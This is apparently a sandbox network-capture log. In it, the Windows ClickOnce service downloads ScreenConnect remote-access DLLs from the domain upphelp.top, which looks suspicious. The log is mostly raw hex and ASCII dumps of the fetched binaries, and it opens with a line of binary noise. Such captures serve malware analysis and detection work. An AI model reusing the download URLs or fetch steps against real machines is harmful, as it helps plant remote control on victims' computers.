GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
2024-09-30 12:20:14 UTC	16384	IN	Data Raw: b2 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 Data Ascii: +{>+Bd+/q+PX!++j,f f,f f: ,t',x)*f2vV
2024-09-30 12:20:14 UTC	16384	IN	Data Raw: 1c 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkk
2024-09-30 12:20:14 UTC	16384	IN	Data Raw: 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
2024-09-30 12:20:14 UTC	16384	IN	Data Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
2024-09-30 12:20:14 UTC	16384	IN	Data Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
2024-09-30 12:20:14 UTC	16384	IN	Data Raw: 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 Data Ascii: rtMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49737	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:15 UTC	119	OUT	GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-09-30 12:20:16 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 68096 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:15 GMT Connection: close
2024-09-30 12:20:16 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 d8 54 90 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 64 fa 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0T" 0 @ d@
2024-09-30 12:20:16 UTC	16384	IN	Data Raw: 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,oe4g(V{To#o((J{Vo)(*(0C
2024-09-30 12:20:16 UTC	16384	IN	Data Raw: 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 Data Ascii: '--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
2024-09-30 12:20:16 UTC	16384	IN	Data Raw: 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e Data Ascii: ityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionIn
2024-09-30 12:20:16 UTC	2776	IN	Data Raw: 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49738	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:17 UTC	113	OUT	GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip Connection: Keep-Alive
2024-09-30 12:20:17 UTC	218	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 1721856 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:16 GMT Connection: close
2024-09-30 12:20:17 UTC	16166	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
2024-09-30 12:20:17 UTC	16384	IN	Data Raw: 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35 Data Ascii: ((,o4.s0(~^(rqp((0G%-&(%rp%rp(~%-&s%(2+0:( \|Os(n,5
2024-09-30 12:20:17 UTC	16384	IN	Data Raw: fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f Data Ascii: }}}{(}{(-{s{z2{0<{3{(NoO3}+sM{}(Sz(,}(NoO}*0{,;}%X
2024-09-30 12:20:18 UTC	16384	IN	Data Raw: 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56 Data Ascii: n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"\|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
2024-09-30 12:20:18 UTC	16384	IN	Data Raw: c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
2024-09-30 12:20:18 UTC	16384	IN	Data Raw: 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69 Data Ascii: [4E_9<J_FX9iXq7q6YA>)L\|1hS![9L\|95pj\|(Y;k=L[TID%*/ 49>Qbuzdi
2024-09-30 12:20:18 UTC	16384	IN	Data Raw: 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f Data Ascii: >9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe\|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__
2024-09-30 12:20:18 UTC	16384	IN	Data Raw: 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c Data Ascii: baseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHel
2024-09-30 12:20:18 UTC	16384	IN	Data Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
